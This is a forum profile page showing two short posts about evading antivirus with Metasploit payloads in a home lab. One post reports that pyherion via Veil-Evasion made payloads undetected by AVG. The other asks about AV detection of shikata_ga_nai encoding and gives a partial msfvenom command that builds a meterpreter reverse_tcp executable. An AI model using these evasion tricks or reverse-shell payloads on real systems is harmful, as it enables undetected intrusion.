Jump to content

Hadeus

Members
  • Content Count

    2
  • Joined

  • Last visited

About Hadeus

  • Rank
    Newbie

Recent Profile Visitors

437 profile views
  1. @ZaraByte Nice Video btw! So I decided to use pyherion (through veil-evasion) on my payloads. It showed up as FUD on the AVG scan.
  2. I've been pentesting on on my Windows 7 VM lately with shikata_ga_nai encoded payloads I've been generating vai Veil-Evasion and msfvenom. For example, I have been using the windows/meterpreter/reverse_tcp reverse stager to call back to me on my handler on kali and it works BUT thats only when AV is turned off, otherwise my payloads are detected by AV (AVG) Are shikata_ga_nai signatures now detectable via AV? Or perhaps I'm encoding my payloads wrong? Here is an example of one of my payloads root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -a x86 -e x86/shikata_ga_nai -f exe LHOST=
×
×
  • Create New...